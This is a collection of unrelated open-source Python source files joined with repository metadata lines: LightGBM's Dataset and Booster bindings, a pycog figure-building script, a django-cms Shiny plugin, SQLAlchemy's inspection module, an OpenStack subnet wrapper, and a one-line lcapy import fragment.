data : string/numpy array/scipy.sparse
Data source of Dataset.
When data type is string, it represents the path of txt file
label : list or numpy 1-D array, optional
Label of the training data.
weight : list or numpy 1-D array , optional
Weight for each instance.
group : list or numpy 1-D array , optional
Group/query size for dataset
silent : boolean, optional
Whether print messages during construction
params: dict, optional
Other parameters
"""
ret = Dataset(data, label=label, max_bin=self.max_bin, reference=self,
weight=weight, group=group, silent=silent, params=params,
free_raw_data=self.free_raw_data)
ret._predictor = self._predictor
ret.pandas_categorical = self.pandas_categorical
return ret
def subset(self, used_indices, params=None):
"""
Get subset of current dataset
Parameters
----------
used_indices : list of int
Used indices of this subset
params : dict
Other parameters
"""
ret = Dataset(None, reference=self, feature_name=self.feature_name,
categorical_feature=self.categorical_feature, params=params)
ret._predictor = self._predictor
ret.pandas_categorical = self.pandas_categorical
ret.used_indices = used_indices
return ret
def save_binary(self, filename):
"""
Save Dataset to binary file
Parameters
----------
filename : string
Name of the output file.
"""
_safe_call(_LIB.LGBM_DatasetSaveBinary(
self.construct().handle,
c_str(filename)))
def _update_params(self, params):
if not self.params:
self.params = params
else:
self.params.update(params)
def set_field(self, field_name, data):
"""Set property into the Dataset.
Parameters
----------
field_name: str
The field name of the information
data: numpy array or list or None
The array ofdata to be set
"""
if self.handle is None:
raise Exception("Cannot set %s before construct dataset" % field_name)
if data is None:
"""set to None"""
_safe_call(_LIB.LGBM_DatasetSetField(
self.handle,
c_str(field_name),
None,
ctypes.c_int(0),
ctypes.c_int(FIELD_TYPE_MAPPER[field_name])))
return
dtype = np.float32
if field_name == 'group':
dtype = np.int32
elif field_name == 'init_score':
dtype = np.float64
data = list_to_1d_numpy(data, dtype, name=field_name)
if data.dtype == np.float32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_float))
type_data = C_API_DTYPE_FLOAT32
elif data.dtype == np.float64:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_double))
type_data = C_API_DTYPE_FLOAT64
elif data.dtype == np.int32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_int32))
type_data = C_API_DTYPE_INT32
else:
raise TypeError("Excepted np.float32/64 or np.int32, meet type({})".format(data.dtype))
if type_data != FIELD_TYPE_MAPPER[field_name]:
raise TypeError("Input type error for set_field")
_safe_call(_LIB.LGBM_DatasetSetField(
self.handle,
c_str(field_name),
ptr_data,
ctypes.c_int(len(data)),
ctypes.c_int(type_data)))
def get_field(self, field_name):
"""Get property from the Dataset.
Parameters
----------
field_name: str
The field name of the information
Returns
-------
info : array
A numpy array of information of the data
"""
if self.handle is None:
raise Exception("Cannot get %s before construct dataset" % field_name)
tmp_out_len = ctypes.c_int()
out_type = ctypes.c_int()
ret = ctypes.POINTER(ctypes.c_void_p)()
_safe_call(_LIB.LGBM_DatasetGetField(
self.handle,
c_str(field_name),
ctypes.byref(tmp_out_len),
ctypes.byref(ret),
ctypes.byref(out_type)))
if out_type.value != FIELD_TYPE_MAPPER[field_name]:
raise TypeError("Return type error for get_field")
if tmp_out_len.value == 0:
return None
if out_type.value == C_API_DTYPE_INT32:
return cint32_array_to_numpy(ctypes.cast(ret, ctypes.POINTER(ctypes.c_int32)), tmp_out_len.value)
elif out_type.value == C_API_DTYPE_FLOAT32:
return cfloat32_array_to_numpy(ctypes.cast(ret, ctypes.POINTER(ctypes.c_float)), tmp_out_len.value)
elif out_type.value == C_API_DTYPE_FLOAT64:
return cfloat64_array_to_numpy(ctypes.cast(ret, ctypes.POINTER(ctypes.c_double)), tmp_out_len.value)
else:
raise TypeError("Unknown type")
def set_categorical_feature(self, categorical_feature):
"""
Set categorical features
Parameters
----------
categorical_feature : list of int or str
Name/index of categorical features
"""
if self.categorical_feature == categorical_feature:
return
if self.data is not None:
self.categorical_feature = categorical_feature
self._free_handle()
else:
raise LightGBMError("Cannot set categorical feature after freed raw data, set free_raw_data=False when construct Dataset to avoid this.")
def _set_predictor(self, predictor):
"""
Set predictor for continued training, not recommand for user to call this function.
Please set init_model in engine.train or engine.cv
"""
if predictor is self._predictor:
return
if self.data is not None:
self._predictor = predictor
self._free_handle()
else:
raise LightGBMError("Cannot set predictor after freed raw data, set free_raw_data=False when construct Dataset to avoid this.")
def set_reference(self, reference):
"""
Set reference dataset
Parameters
----------
reference : Dataset
Will use reference as template to consturct current dataset
"""
self.set_categorical_feature(reference.categorical_feature)
self.set_feature_name(reference.feature_name)
self._set_predictor(reference._predictor)
if self.reference is reference:
return
if self.data is not None:
self.reference = reference
self._free_handle()
else:
raise LightGBMError("Cannot set reference after freed raw data, set free_raw_data=False when construct Dataset to avoid this.")
def set_feature_name(self, feature_name):
"""
Set feature name
Parameters
----------
feature_name : list of str
Feature names
"""
self.feature_name = feature_name
if self.handle is not None and feature_name is not None and feature_name != 'auto':
if len(feature_name) != self.num_feature():
raise ValueError("Length of feature_name({}) and num_feature({}) don't match".format(len(feature_name), self.num_feature()))
c_feature_name = [c_str(name) for name in feature_name]
_safe_call(_LIB.LGBM_DatasetSetFeatureNames(
self.handle,
c_array(ctypes.c_char_p, c_feature_name),
ctypes.c_int(len(feature_name))))
def set_label(self, label):
"""
Set label of Dataset
Parameters
----------
label: numpy array or list or None
The label information to be set into Dataset
"""
self.label = label
if self.handle is not None:
label = list_to_1d_numpy(label, name='label')
self.set_field('label', label)
def set_weight(self, weight):
"""
Set weight of each instance.
Parameters
----------
weight : numpy array or list or None
Weight for each data point
"""
self.weight = weight
if self.handle is not None and weight is not None:
weight = list_to_1d_numpy(weight, name='weight')
self.set_field('weight', weight)
def set_init_score(self, init_score):
"""
Set init score of booster to start from.
Parameters
----------
init_score: numpy array or list or None
Init score for booster
"""
self.init_score = init_score
if self.handle is not None and init_score is not None:
init_score = list_to_1d_numpy(init_score, np.float64, name='init_score')
self.set_field('init_score', init_score)
def set_group(self, group):
"""
Set group size of Dataset (used for ranking).
Parameters
----------
group : numpy array or list or None
Group size of each group
"""
self.group = group
if self.handle is not None and group is not None:
group = list_to_1d_numpy(group, np.int32, name='group')
self.set_field('group', group)
def get_label(self):
"""
Get the label of the Dataset.
Returns
-------
label : array
"""
if self.label is None and self.handle is not None:
self.label = self.get_field('label')
return self.label
def get_weight(self):
"""
Get the weight of the Dataset.
Returns
-------
weight : array
"""
if self.weight is None and self.handle is not None:
self.weight = self.get_field('weight')
return self.weight
def get_init_score(self):
"""
Get the initial score of the Dataset.
Returns
-------
init_score : array
"""
if self.init_score is None and self.handle is not None:
self.init_score = self.get_field('init_score')
return self.init_score
def get_group(self):
"""
Get the initial score of the Dataset.
Returns
-------
init_score : array
"""
if self.group is None and self.handle is not None:
self.group = self.get_field('group')
if self.group is not None:
# group data from LightGBM is boundaries data, need to convert to group size
new_group = []
for i in range_(len(self.group) - 1):
new_group.append(self.group[i + 1] - self.group[i])
self.group = new_group
return self.group
def num_data(self):
"""
Get the number of rows in the Dataset.
Returns
-------
number of rows : int
"""
if self.handle is not None:
ret = ctypes.c_int()
_safe_call(_LIB.LGBM_DatasetGetNumData(self.handle,
ctypes.byref(ret)))
return ret.value
else:
raise LightGBMError("Cannot get num_data before construct dataset")
def num_feature(self):
"""
Get the number of columns (features) in the Dataset.
Returns
-------
number of columns : int
"""
if self.handle is not None:
ret = ctypes.c_int()
_safe_call(_LIB.LGBM_DatasetGetNumFeature(self.handle,
ctypes.byref(ret)))
return ret.value
else:
raise LightGBMError("Cannot get num_feature before construct dataset")
class Booster(object):
""""Booster in LightGBM."""
def __init__(self, params=None, train_set=None, model_file=None, silent=False):
"""
Initialize the Booster.
Parameters
----------
params : dict
Parameters for boosters.
train_set : Dataset
Training dataset
model_file : string
Path to the model file.
silent : boolean, optional
Whether print messages during construction
"""
self.handle = ctypes.c_void_p()
self.__need_reload_eval_info = True
self.__train_data_name = "training"
self.__attr = {}
self.best_iteration = -1
params = {} if params is None else params
if silent:
params["verbose"] = 0
elif "verbose" not in params:
params["verbose"] = 1
if train_set is not None:
"""Training task"""
if not isinstance(train_set, Dataset):
raise TypeError('Training data should be Dataset instance, met {}'.format(type(train_set).__name__))
params_str = param_dict_to_str(params)
"""construct booster object"""
_safe_call(_LIB.LGBM_BoosterCreate(
train_set.construct().handle,
c_str(params_str),
ctypes.byref(self.handle)))
"""save reference to data"""
self.train_set = train_set
self.valid_sets = []
self.name_valid_sets = []
self.__num_dataset = 1
self.__init_predictor = train_set._predictor
if self.__init_predictor is not None:
_safe_call(_LIB.LGBM_BoosterMerge(
self.handle,
self.__init_predictor.handle))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.__num_class = out_num_class.value
"""buffer for inner predict"""
self.__inner_predict_buffer = [None]
self.__is_predicted_cur_iter = [False]
self.__get_eval_info()
self.pandas_categorical = train_set.pandas_categorical
elif model_file is not None:
"""Prediction task"""
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterCreateFromModelfile(
c_str(model_file),
ctypes.byref(out_num_iterations),
ctypes.byref(self.handle)))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.__num_class = out_num_class.value
self.pandas_categorical = _load_pandas_categorical(model_file)
elif 'model_str' in params:
self.__load_model_from_string(params['model_str'])
else:
raise TypeError('Need at least one training dataset or model file to create booster instance')
def __del__(self):
if self.handle is not None:
_safe_call(_LIB.LGBM_BoosterFree(self.handle))
def __copy__(self):
return self.__deepcopy__(None)
def __deepcopy__(self, _):
model_str = self.__save_model_to_string()
booster = Booster({'model_str': model_str})
booster.pandas_categorical = self.pandas_categorical
return booster
def __getstate__(self):
this = self.__dict__.copy()
handle = this['handle']
this.pop('train_set', None)
this.pop('valid_sets', None)
if handle is not None:
this["handle"] = self.__save_model_to_string()
return this
def __setstate__(self, state):
model_str = state.get('handle', None)
if model_str is not None:
handle = ctypes.c_void_p()
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterLoadModelFromString(
c_str(model_str),
ctypes.byref(out_num_iterations),
ctypes.byref(handle)))
state['handle'] = handle
self.__dict__.update(state)
def set_train_data_name(self, name):
self.__train_data_name = name
def add_valid(self, data, name):
"""
Add an validation data
Parameters
----------
data : Dataset
Validation data
name : String
Name of validation data
"""
if not isinstance(data, Dataset):
raise TypeError('valid data should be Dataset instance, met {}'.format(type(data).__name__))
if data._predictor is not self.__init_predictor:
raise LightGBMError("Add validation data failed, you should use same predictor for these data")
_safe_call(_LIB.LGBM_BoosterAddValidData(
self.handle,
data.construct().handle))
self.valid_sets.append(data)
self.name_valid_sets.append(name)
self.__num_dataset += 1
self.__inner_predict_buffer.append(None)
self.__is_predicted_cur_iter.append(False)
def reset_parameter(self, params):
"""
Reset parameters for booster
Parameters
----------
params : dict
New parameters for boosters
silent : boolean, optional
Whether print messages during construction
"""
if 'metric' in params:
self.__need_reload_eval_info = True
params_str = param_dict_to_str(params)
if params_str:
_safe_call(_LIB.LGBM_BoosterResetParameter(
self.handle,
c_str(params_str)))
def update(self, train_set=None, fobj=None):
"""
Update for one iteration
Note: for multi-class task, the score is group by class_id first, then group by row_id
if you want to get i-th row score in j-th class, the access way is score[j*num_data+i]
and you should group grad and hess in this way as well
Parameters
----------
train_set :
Training data, None means use last training data
fobj : function
Customized objective function.
Returns
-------
is_finished, bool
"""
"""need reset training data"""
if train_set is not None and train_set is not self.train_set:
if not isinstance(train_set, Dataset):
raise TypeError('Training data should be Dataset instance, met {}'.format(type(train_set).__name__))
if train_set._predictor is not self.__init_predictor:
raise LightGBMError("Replace training data failed, you should use same predictor for these data")
self.train_set = train_set
_safe_call(_LIB.LGBM_BoosterResetTrainingData(
self.handle,
self.train_set.construct().handle))
self.__inner_predict_buffer[0] = None
is_finished = ctypes.c_int(0)
if fobj is None:
_safe_call(_LIB.LGBM_BoosterUpdateOneIter(
self.handle,
ctypes.byref(is_finished)))
self.__is_predicted_cur_iter = [False for _ in range_(self.__num_dataset)]
return is_finished.value == 1
else:
grad, hess = fobj(self.__inner_predict(0), self.train_set)
return self.__boost(grad, hess)
def __boost(self, grad, hess):
"""
Boost the booster for one iteration, with customized gradient statistics.
Note: for multi-class task, the score is group by class_id first, then group by row_id
if you want to get i-th row score in j-th class, the access way is score[j*num_data+i]
and you should group grad and hess in this way as well
Parameters
----------
grad : 1d numpy or 1d list
The first order of gradient.
hess : 1d numpy or 1d list
The second order of gradient.
Returns
-------
is_finished, bool
"""
grad = list_to_1d_numpy(grad, name='gradient')
hess = list_to_1d_numpy(hess, name='hessian')
if len(grad) != len(hess):
raise ValueError("Lengths of gradient({}) and hessian({}) don't match".format(len(grad), len(hess)))
is_finished = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterUpdateOneIterCustom(
self.handle,
grad.ctypes.data_as(ctypes.POINTER(ctypes.c_float)),
hess.ctypes.data_as(ctypes.POINTER(ctypes.c_float)),
ctypes.byref(is_finished)))
self.__is_predicted_cur_iter = [False for _ in range_(self.__num_dataset)]
return is_finished.value == 1
def rollback_one_iter(self):
"""
Rollback one iteration
"""
_safe_call(_LIB.LGBM_BoosterRollbackOneIter(
self.handle))
self.__is_predicted_cur_iter = [False for _ in range_(self.__num_dataset)]
def current_iteration(self):
out_cur_iter = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetCurrentIteration(
self.handle,
ctypes.byref(out_cur_iter)))
return out_cur_iter.value
def eval(self, data, name, feval=None):
"""
Evaluate for data
Parameters
----------
data : Dataset object
name :
Name of data
feval : function
Custom evaluation function.
Returns
-------
result: list
Evaluation result list.
"""
if not isinstance(data, Dataset):
raise TypeError("Can only eval for Dataset instance")
data_idx = -1
if data is self.train_set:
data_idx = 0
else:
for i in range_(len(self.valid_sets)):
if data is self.valid_sets[i]:
data_idx = i + 1
break
"""need to push new valid data"""
if data_idx == -1:
self.add_valid(data, name)
data_idx = self.__num_dataset - 1
return self.__inner_eval(name, data_idx, feval)
def eval_train(self, feval=None):
"""
Evaluate for training data
Parameters
----------
feval : function
Custom evaluation function.
Returns
-------
result: str
Evaluation result list.
"""
return self.__inner_eval(self.__train_data_name, 0, feval)
def eval_valid(self, feval=None):
"""
Evaluate for validation data
Parameters
----------
feval : function
Custom evaluation function.
Returns
-------
result: str
Evaluation result list.
"""
return [item for i in range_(1, self.__num_dataset)
for item in self.__inner_eval(self.name_valid_sets[i - 1], i, feval)]
def save_model(self, filename, num_iteration=-1):
"""
Save model of booster to file
Parameters
----------
filename : str
Filename to save
num_iteration: int
Number of iteration that want to save. < 0 means save the best iteration(if have)
"""
if num_iteration <= 0:
num_iteration = self.best_iteration
_safe_call(_LIB.LGBM_BoosterSaveModel(
self.handle,
ctypes.c_int(num_iteration),
c_str(filename)))
_save_pandas_categorical(filename, self.pandas_categorical)
def __load_model_from_string(self, model_str):
"""[Private] Load model from string"""
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterLoadModelFromString(
c_str(model_str),
ctypes.byref(out_num_iterations),
ctypes.byref(self.handle)))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.__num_class = out_num_class.value
def __save_model_to_string(self, num_iteration=-1):
"""[Private] Save model to string"""
if num_iteration <= 0:
num_iteration = self.best_iteration
buffer_len = 1 << 20
tmp_out_len = ctypes.c_int(0)
string_buffer = ctypes.create_string_buffer(buffer_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterSaveModelToString(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(buffer_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
actual_len = tmp_out_len.value
'''if buffer length is not long enough, re-allocate a buffer'''
if actual_len > buffer_len:
string_buffer = ctypes.create_string_buffer(actual_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterSaveModelToString(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(actual_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
return string_buffer.value.decode()
def dump_model(self, num_iteration=-1):
"""
Dump model to json format
Parameters
----------
num_iteration: int
Number of iteration that want to dump. < 0 means dump to best iteration(if have)
Returns
-------
Json format of model
"""
if num_iteration <= 0:
num_iteration = self.best_iteration
buffer_len = 1 << 20
tmp_out_len = ctypes.c_int(0)
string_buffer = ctypes.create_string_buffer(buffer_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterDumpModel(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(buffer_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
actual_len = tmp_out_len.value
'''if buffer length is not long enough, reallocate a buffer'''
if actual_len > buffer_len:
string_buffer = ctypes.create_string_buffer(actual_len)
ptr_string_buffer = ctypes.c_char_p(*[ctypes.addressof(string_buffer)])
_safe_call(_LIB.LGBM_BoosterDumpModel(
self.handle,
ctypes.c_int(num_iteration),
ctypes.c_int(actual_len),
ctypes.byref(tmp_out_len),
ptr_string_buffer))
return json.loads(string_buffer.value.decode())
def predict(self, data, num_iteration=-1, raw_score=False, pred_leaf=False, data_has_header=False, is_reshape=True):
"""
Predict logic
Parameters
----------
data : string/numpy array/scipy.sparse
Data source for prediction
When data type is string, it represents the path of txt file
num_iteration : int
Used iteration for prediction, < 0 means predict for best iteration(if have)
raw_score : bool
True for predict raw score
pred_leaf : bool
True for predict leaf index
data_has_header : bool
Used for txt data
is_reshape : bool
Reshape to (nrow, ncol) if true
Returns
-------
Prediction result
"""
predictor = self._to_predictor()
if num_iteration <= 0:
num_iteration = self.best_iteration
return predictor.predict(data, num_iteration, raw_score, pred_leaf, data_has_header, is_reshape)
def _to_predictor(self):
"""Convert to predictor"""
predictor = _InnerPredictor(booster_handle=self.handle)
predictor.pandas_categorical = self.pandas_categorical
return predictor
def feature_name(self):
"""
Get feature names.
Returns
-------
result : array
Array of feature names.
"""
out_num_feature = ctypes.c_int(0)
"""Get num of features"""
_safe_call(_LIB.LGBM_BoosterGetNumFeature(
self.handle,
ctypes.byref(out_num_feature)))
num_feature = out_num_feature.value
"""Get name of features"""
tmp_out_len = ctypes.c_int(0)
string_buffers = [ctypes.create_string_buffer(255) for i in range_(num_feature)]
ptr_string_buffers = (ctypes.c_char_p * num_feature)(*map(ctypes.addressof, string_buffers))
_safe_call(_LIB.LGBM_BoosterGetFeatureNames(
self.handle,
ctypes.byref(tmp_out_len),
ptr_string_buffers))
if num_feature != tmp_out_len.value:
raise ValueError("Length of feature names doesn't equal with num_feature")
return [string_buffers[i].value.decode() for i in range_(num_feature)]
def feature_importance(self, importance_type='split'):
"""
Get feature importances
Parameters
----------
importance_type : str, default "split"
How the importance is calculated: "split" or "gain"
"split" is the number of times a feature is used in a model
"gain" is the total gain of splits which use the feature
Returns
-------
result : array
Array of feature importances.
"""
if importance_type not in ["split", "gain"]:
raise KeyError("importance_type must be split or gain")
dump_model = self.dump_model()
ret = [0] * (dump_model["max_feature_idx"] + 1)
def dfs(root):
if "split_feature" in root:
if importance_type == 'split':
ret[root["split_feature"]] += 1
elif importance_type == 'gain':
ret[root["split_feature"]] += root["split_gain"]
dfs(root["left_child"])
dfs(root["right_child"])
for tree in dump_model["tree_info"]:
dfs(tree["tree_structure"])
return np.array(ret)
def __inner_eval(self, data_name, data_idx, feval=None):
"""
Evaulate training or validation data
"""
if data_idx >= self.__num_dataset:
raise ValueError("Data_idx should be smaller than number of dataset")
self.__get_eval_info()
ret = []
if self.__num_inner_eval > 0:
result = np.array([0.0 for _ in range_(self.__num_inner_eval)], dtype=np.float64)
tmp_out_len = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetEval(
self.handle,
ctypes.c_int(data_idx),
ctypes.byref(tmp_out_len),
result.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if tmp_out_len.value != self.__num_inner_eval:
raise ValueError("Wrong length of eval results")
for i in range_(self.__num_inner_eval):
ret.append((data_name, self.__name_inner_eval[i], result[i], self.__higher_better_inner_eval[i]))
if feval is not None:
if data_idx == 0:
cur_data = self.train_set
else:
cur_data = self.valid_sets[data_idx - 1]
feval_ret = feval(self.__inner_predict(data_idx), cur_data)
if isinstance(feval_ret, list):
for eval_name, val, is_higher_better in feval_ret:
ret.append((data_name, eval_name, val, is_higher_better))
else:
eval_name, val, is_higher_better = feval_ret
ret.append((data_name, eval_name, val, is_higher_better))
return ret
def __inner_predict(self, data_idx):
"""
Predict for training and validation dataset
"""
if data_idx >= self.__num_dataset:
raise ValueError("Data_idx should be smaller than number of dataset")
if self.__inner_predict_buffer[data_idx] is None:
if data_idx == 0:
n_preds = self.train_set.num_data() * self.__num_class
else:
n_preds = self.valid_sets[data_idx - 1].num_data() * self.__num_class
self.__inner_predict_buffer[data_idx] = \
np.array([0.0 for _ in range_(n_preds)], dtype=np.float64, copy=False)
"""avoid to predict many time in one iteration"""
if not self.__is_predicted_cur_iter[data_idx]:
tmp_out_len = ctypes.c_int64(0)
data_ptr = self.__inner_predict_buffer[data_idx].ctypes.data_as(ctypes.POINTER(ctypes.c_double))
_safe_call(_LIB.LGBM_BoosterGetPredict(
self.handle,
ctypes.c_int(data_idx),
ctypes.byref(tmp_out_len),
data_ptr))
if tmp_out_len.value != len(self.__inner_predict_buffer[data_idx]):
raise ValueError("Wrong length of predict results for data %d" % (data_idx))
self.__is_predicted_cur_iter[data_idx] = True
return self.__inner_predict_buffer[data_idx]
def __get_eval_info(self):
"""
Get inner evaluation count and names
"""
if self.__need_reload_eval_info:
self.__need_reload_eval_info = False
out_num_eval = ctypes.c_int(0)
"""Get num of inner evals"""
_safe_call(_LIB.LGBM_BoosterGetEvalCounts(
self.handle,
ctypes.byref(out_num_eval)))
self.__num_inner_eval = out_num_eval.value
if self.__num_inner_eval > 0:
"""Get name of evals"""
tmp_out_len = ctypes.c_int(0)
string_buffers = [ctypes.create_string_buffer(255) for i in range_(self.__num_inner_eval)]
ptr_string_buffers = (ctypes.c_char_p * self.__num_inner_eval)(*map(ctypes.addressof, string_buffers))
_safe_call(_LIB.LGBM_BoosterGetEvalNames(
self.handle,
ctypes.byref(tmp_out_len),
ptr_string_buffers))
if self.__num_inner_eval != tmp_out_len.value:
raise ValueError("Length of eval names doesn't equal with num_evals")
self.__name_inner_eval = \
[string_buffers[i].value.decode() for i in range_(self.__num_inner_eval)]
self.__higher_better_inner_eval = \
[name.startswith(('auc', 'ndcg')) for name in self.__name_inner_eval]
def attr(self, key):
"""
Get attribute string from the Booster.
Parameters
----------
key : str
The key to get attribute from.
Returns
-------
value : str
The attribute value of the key, returns None if attribute do not exist.
"""
return self.__attr.get(key, None)
def set_attr(self, **kwargs):
"""
Set the attribute of the Booster.
Parameters
----------
**kwargs
The attributes to set. Setting a value to None deletes an attribute.
"""
for key, value in kwargs.items():
if value is not None:
if not isinstance(value, string_type):
raise ValueError("Set attr only accepts strings")
self.__attr[key] = value
else:
self.__attr.pop(key, None)
| sightmachine/LightGBM | python-package/lightgbm/basic.py | Python | mit | 67,498 |
#! /usr/bin/env python
import os
import subprocess
import sys
from os.path import join
from pycog.utils import get_here, mkdir_p
#=========================================================================================
# Shared steps
#=========================================================================================
here = get_here(__file__)
base = os.path.abspath(join(here, os.pardir))
paperpath = join(base, 'paper')
mkdir_p(join(paperpath, 'figs', 'plos'))
def call(s):
rv = subprocess.call(s.split())
if rv != 0:
sys.stdout.flush()
print("Something went wrong (return code {}).".format(rv)
+ " We're probably out of memory.")
sys.exit(1)
def figure(fig, n):
call('python ' + join(paperpath, fig + '.py'))
call('mv {} {}'.format(join(paperpath, 'figs', fig + '.eps'),
join(paperpath, 'figs', 'plos', 'fig{}.eps'.format(n))))
#=========================================================================================
figs = {
'fig_rdm': 2,
'fig_structure': 3,
'fig_mante': 4,
'fig_connectivity': 5,
'fig_multisensory': 6,
'fig_romo': 7,
'fig_lee': 8,
'fig_performance': 9
}
for f, n in figs.items():
figure(f, n)
| frsong/pycog | paper/plos.py | Python | mit | 1,305 |
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms_shiny.models import ShinyAppPluginModel
class ShinyAppPlugin(CMSPluginBase):
model = ShinyAppPluginModel
module = "Lab Plugins"
name = _("Shiny App Plugin")
render_template = "cms_shiny/plugin.html"
def render(self, context, instance, placeholder):
context.update({'instance':instance})
return context
plugin_pool.register_plugin(ShinyAppPlugin)
| mfcovington/djangocms-shiny-app | cms_shiny/cms_plugins.py | Python | bsd-3-clause | 554 |
# sqlalchemy/inspect.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The inspection module provides the :func:`.inspect` function,
which delivers runtime information about a wide variety
of SQLAlchemy objects, both within the Core as well as the
ORM.
The :func:`.inspect` function is the entry point to SQLAlchemy's
public API for viewing the configuration and construction
of in-memory objects. Depending on the type of object
passed to :func:`.inspect`, the return value will either be
a related object which provides a known interface, or in many
cases it will return the object itself.
The rationale for :func:`.inspect` is twofold. One is that
it replaces the need to be aware of a large variety of "information
getting" functions in SQLAlchemy, such as :meth:`.Inspector.from_engine`,
:func:`.orm.attributes.instance_state`, :func:`.orm.class_mapper`,
and others. The other is that the return value of :func:`.inspect`
is guaranteed to obey a documented API, thus allowing third party
tools which build on top of SQLAlchemy configurations to be constructed
in a forwards-compatible way.
.. versionadded:: 0.8 The :func:`.inspect` system is introduced
as of version 0.8.
"""
from . import util, exc
_registrars = util.defaultdict(list)
def inspect(subject, raiseerr=True):
"""Produce an inspection object for the given target.
The returned value in some cases may be the
same object as the one given, such as if a
:class:`.orm.Mapper` object is passed. In other
cases, it will be an instance of the registered
inspection type for the given object, such as
if a :class:`.engine.Engine` is passed, an
:class:`.engine.Inspector` object is returned.
:param subject: the subject to be inspected.
:param raiseerr: When ``True``, if the given subject
does not
correspond to a known SQLAlchemy inspected type,
:class:`sqlalchemy.exc.NoInspectionAvailable`
is raised. If ``False``, ``None`` is returned.
"""
type_ = type(subject)
for cls in type_.__mro__:
if cls in _registrars:
reg = _registrars[cls]
if reg is True:
return subject
ret = reg(subject)
if ret is not None:
break
else:
reg = ret = None
if raiseerr and (
reg is None or ret is None
):
raise exc.NoInspectionAvailable(
"No inspection system is "
"available for object of type %s" %
type_)
return ret
def _inspects(*types):
def decorate(fn_or_cls):
for type_ in types:
if type_ in _registrars:
raise AssertionError(
"Type %s is already "
"registered" % type_)
_registrars[type_] = fn_or_cls
return fn_or_cls
return decorate
def _self_inspects(cls):
_inspects(cls)(True)
return cls
| michaelgugino/turbo-lister | sqlalchemy/inspection.py | Python | gpl-3.0 | 3,113 |
# Copyright (c) 2017 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import logging
from vio.pub.msapi.extsys import get_vim_by_id
from vio.pub.vim.drivers.vimsdk import neutron_v2_0
from vio.pub.vim.vimapi.network.OperateNetwork import BaseNet,translate
logger = logging.getLogger(__name__)
class OperateSubnet(BaseNet):
keys_mapping = {"tenantId": "project_id",
"networkId": "network_id",
"ipVersion": "ip_version",
"gaetwayIp": "gateway_ip",
"dnsNameservers": "dns_nameservers",
"hostRoutes": "host_routes",
"allocationPools": "allocation_pools",
"enableDhcp": "is_dhcp_enabled"
}
def ___init__(self, params):
super(OperateSubnet, self).__init__(params)
def _convert(self, subnet):
result = {}
result['status'] = 'ok'
result['id'] = subnet.id
result['networkId'] = subnet.network_id
result['name'] = subnet.name
result['allocationPools'] = subnet.allocation_pools
result['gatewayIp'] = subnet.gateway_ip
result['dnsNameServers'] = subnet.dns_nameservers
result['ipVersion'] = subnet.ip_version
result['enableDhcp'] = subnet.is_dhcp_enabled
result['hostRoutes'] = subnet.host_routes
result['cidr'] = subnet.cidr
return result
def create_subnet(self, vimid, tenantid, body):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
body = translate(self.keys_mapping, body)
subnet = network.subnet_create(**body)
vim_dict = {"vimName": vim_info['name'], "vimId": vim_info['vimId'], "tenantId": tenantid}
resp = self._convert(subnet)
resp.update(vim_dict)
return resp
def list_subnet(self, vimid, tenantid, subnetid, ignore_missing=False):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
subnet = network.subnet_get(subnetid, ignore_missing=ignore_missing)
if subnet is None:
return subnet
vim_dict = {"vimName": vim_info['name'], "vimId": vim_info['vimId'], "tenantId": tenantid}
resp = self._convert(subnet)
resp.update(vim_dict)
return resp
def delete_subnet(self, vimid, tenantid, subnetid):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
return network.subnet_delete(subnetid)
def list_subnets(self, vimid, tenantid, **query):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
query.update({"project_id": tenantid})
resp = network.subnets_get(**query)
vim_dict = {"vimName": vim_info['name'], "vimId": vim_info['vimId'], "tenantId": tenantid}
subnets = {'subnets': []}
if resp:
for subnet in resp:
subnets['subnets'].append(self._convert(subnet))
subnets.update(vim_dict)
return subnets
| onesafe/multivimdriver-vmware-vio | vio/vio/pub/vim/vimapi/network/OperateSubnet.py | Python | apache-2.0 | 3,441 |
from lcapy import *
import unittest
